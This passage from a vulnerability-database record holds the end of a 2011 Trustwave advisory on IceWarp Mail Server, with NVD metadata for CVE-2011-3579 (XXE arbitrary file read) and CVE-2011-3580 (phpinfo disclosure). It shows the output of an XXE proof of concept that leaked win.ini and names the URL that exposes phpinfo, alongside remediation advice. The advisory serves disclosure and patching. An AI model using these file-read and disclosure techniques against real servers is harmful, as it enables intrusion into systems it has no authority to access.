GMT \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control:no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 Pragma: no-cache \nContent-Type: text/xml \nVary: Accept-Encoding \nContent-Length: 1113 \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?><iq type=\"error\"><error \nuid=\"login_invalid\">test; for 16-bit app support \n[fonts] \n[extensions] \n[mci extensions] \n[files] \n[Mail] \nMAPI=1 \n....TRUNCATED \n \nThe above proof-of-concept would retrieve the c:\\windows\\win.ini file (the \nresponse in this example has been truncated). \n \n \nFinding 2: PHP Information Disclosure \nCVE: CVE-2011-3580 \n \nIt is possible to retrieve the PHP information file phpinfo() by accessing \nthe following URL http://A.B.C.D/server where A.B.C.D is the IP of the \nserver running the IceWarp software. The response will be a page detailing \nthe PHP version used and the configuration settings of PHP, including \nsystem details. \n \n \nVendor Response: These issues have been addressed as of version 10.3.3 \n \nRemediation Steps: Customers should update to the latest version of IceWarp \nMail Server in order to address these issues. The above issues have been \ncorrected in version 10.3.3. \n \nRevision History: \n08/03/11 - Vulnerability disclosed \n09/19/11 - Patch released \n09/23/11 - Advisory published \n \n \nAbout Trustwave: Trustwave is the leading provider of on-demand and \nsubscription-based information security and payment card industry \ncompliance management solutions to businesses and government entities \nthroughout the world. For organizations faced with today's challenging \ndata security and compliance environment, Trustwave provides a unique \napproach with comprehensive solutions that include its flagship \nTrustKeeper compliance management software and other proprietary security \nsolutions. 
Trustwave has helped thousands of organizations--ranging from \nFortune 500 businesses and large financial institutions to small and \nmedium-sized retailers--manage compliance and secure their network \ninfrastructure, data communications and critical information assets. \nTrustwave is headquartered in Chicago with offices throughout North \nAmerica, South America, Europe, Africa, China and Australia. For more \ninformation, visit https://www.trustwave.com \n \nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at \nTrustwave responsible for incident response and forensics, ethical hacking \nand application security tests for Trustwave's clients. SpiderLabs has \nresponded to hundreds of security incidents, performed thousands of ethical \nhacking exercises and tested the security of hundreds of business \napplications for Fortune 500 organizations. For more information visit \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: The information provided in this advisory is provided \"as is\" \nwithout warranty of any kind. Trustwave disclaims all warranties, either \nexpress or implied, including the warranties of merchantability and fitness \nfor a particular purpose. In no event shall Trustwave or its suppliers be \nliable for any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. \n \n
`\n", "sourceHref": "https://packetstormsecurity.com/files/download/105320/TWSL2011-013.txt", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:29:21", "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "cvss3": {}, "published": "2011-09-30T17:55:00", "type": "cve", "title": "CVE-2011-3579", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3579"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:icewarp:mail_server:9.3.0", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.3.2", 
"cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:10.1.2"], "id": "CVE-2011-3579", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:29:22", "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "cvss3": {}, "published": "2011-09-30T17:55:00", "type": "cve", "title": "CVE-2011-3580", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3580"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:icewarp:mail_server:9.3.0", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:10.1.2"], "id": "CVE-2011-3580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:45:23", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2011-09-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-3010", "CVE-2011-3645", "CVE-2011-3579"], "modified": "2011-09-26T00:00:00", "id": "SECURITYVULNS:VULN:11920", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11920", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}